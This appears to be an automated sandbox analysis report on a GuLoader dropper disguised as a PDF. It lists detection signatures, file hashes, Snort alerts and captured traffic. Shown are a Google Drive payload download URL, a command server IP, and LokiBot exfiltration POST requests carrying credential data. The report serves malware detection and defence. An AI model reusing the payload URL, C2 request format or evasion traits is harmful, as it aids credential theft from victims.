Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Anexo I e II do convite#U00b7pdf.exe

Overview

General Information

Sample Name:Anexo I e II do convite#U00b7pdf.exe
Analysis ID:531208
MD5:e779a8be256d298c6d96884724d7792b
SHA1:5ff1cb154e5001791e3dd019721462fe20bfec80
SHA256:9dbfeb5b6cdf7f40899f2f36ecd59d8c1f72ec680248e4b42f69496c61b5d19c
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id="}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id="}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Anexo I e II do convite#U00b7pdf.exeVirustotal: Detection: 29%Perma Link
      Machine Learning detection for sampleShow sources
      Source: Anexo I e II do convite#U00b7pdf.exeJoe Sandbox ML: detected
      Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.1.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.3.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 0.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.2.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 0.2.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: Anexo I e II do convite#U00b7pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 216.58.209.46:443 -> 192.168.2.3:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.208.129:443 -> 192.168.2.3:49747 version: TLS 1.2

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49748 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49748 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49749 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49749 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 63.250.34.171:80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=
      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 63.250.34.171 63.250.34.171
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-14-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 163Connection: close
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:02 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:05 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:09 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://ocsp.digicert.com0O
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-14-docs.googleusercontent.com/
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/i
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQhb_RBrBtzpisGKe78
      Source: Anexo I e II do convite#U00b7pdf.exeString found in binary or memory: https://www.digicert.com/CPS0
      Source: unknownHTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-14-docs.googleusercontent.comConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 216.58.209.46:443 -> 192.168.2.3:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.208.129:443 -> 192.168.2.3:49747 version: TLS 1.2

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: Anexo I e II do convite#U00b7pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A269B0_2_020A269B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A942C0_2_020A942C
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADAD00_2_020ADAD0
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AEEF50_2_020AEEF5
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A820F0_2_020A820F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD26B0_2_020AD26B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A826F0_2_020A826F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A72630_2_020A7263
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A72A30_2_020A72A3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD2E30_2_020AD2E3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A82FB0_2_020A82FB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD3430_2_020AD343
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A835F0_2_020A835F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A43640_2_020A4364
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A83CB0_2_020A83CB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD3F70_2_020AD3F7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD02E0_2_020AD02E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AE0330_2_020AE033
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD05B0_2_020AD05B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AE0620_2_020AE062
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A80670_2_020A8067
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AE08F0_2_020AE08F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A90990_2_020A9099
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A70A80_2_020A70A8
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A80BB0_2_020A80BB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD0BF0_2_020AD0BF
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A90CF0_2_020A90CF
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD1030_2_020AD103
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A912B0_2_020A912B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A71270_2_020A7127
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A81300_2_020A8130
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD15F0_2_020AD15F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AA17B0_2_020AA17B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AE1770_2_020AE177
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A81BB0_2_020A81BB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD1DB0_2_020AD1DB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A76430_2_020A7643
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AB6450_2_020AB645
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A76B30_2_020A76B3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A77230_2_020A7723
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A77B80_2_020A77B8
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AF7D50_2_020AF7D5
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AE4310_2_020AE431
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A945F0_2_020A945F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A84630_2_020A8463
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A04940_2_020A0494
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AE4A70_2_020AE4A7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A94C30_2_020A94C3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AC4EB0_2_020AC4EB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A84FB0_2_020A84FB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A750E0_2_020A750E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AE5170_2_020AE517
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A95230_2_020A9523
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A85470_2_020A8547
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A75520_2_020A7552
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A85CB0_2_020A85CB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9A530_2_020A9A53
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7A6F0_2_020A7A6F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A0AB80_2_020A0AB8
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9AD70_2_020A9AD7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7AE70_2_020A7AE7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADB370_2_020ADB37
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9B440_2_020A9B44
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADB6F0_2_020ADB6F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7BA30_2_020A7BA3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADBC70_2_020ADBC7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADBFF0_2_020ADBFF
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A78070_2_020A7807
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A788B0_2_020A788B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A790F0_2_020A790F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A796E0_2_020A796E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A79630_2_020A7963
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A79740_2_020A7974
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A99DB0_2_020A99DB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A79FB0_2_020A79FB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7E6F0_2_020A7E6F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7EE30_2_020A7EE3
